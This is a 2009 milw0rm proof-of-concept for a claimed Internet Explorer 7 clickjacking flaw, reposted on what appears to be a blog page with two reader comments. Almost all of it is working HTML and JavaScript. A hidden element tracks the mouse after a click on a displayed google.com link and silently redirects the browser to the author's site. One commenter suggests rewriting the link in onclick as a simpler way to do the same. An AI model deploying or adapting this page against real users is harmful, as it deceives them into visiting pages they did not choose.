Internet Explorer 7 ClickJacking Vulnerability (2009-01-23)

#############################################################

# Application Name       : İnternet Explorer 7
# Vulnerable Type        : Clickjacking
# Author                     : UzmiX
#############################################################
< ------------------- header data end of ------------------- >
<html>
<body>
<div id="open"


onmouseover="document.location='http://www.uzmix.net';"
style="position:absolute;width:8px;height:7px;background:#FFFFFF;border:1px"></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('open').style.left=mouseX-2;
document.getElementById('open').style.top=mouseY-2;
}
</script>
<center>
<br>
<br>
<a href="http://www.google.com" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://www.google.com</font></a>
</html>

# milw0rm.com [2009-01-29]

相关日志

楼被抢了 2 层了... 抢座Rss 2.0或者 Trackback

  • filter9

    既然都可以執行onClick了,為何不這麼做

    onclick=”this.href=’http://www.yahoo.com'” ?

  • filter9

    onclick=”this.href=’http://www.yahoo.com'”

发表评论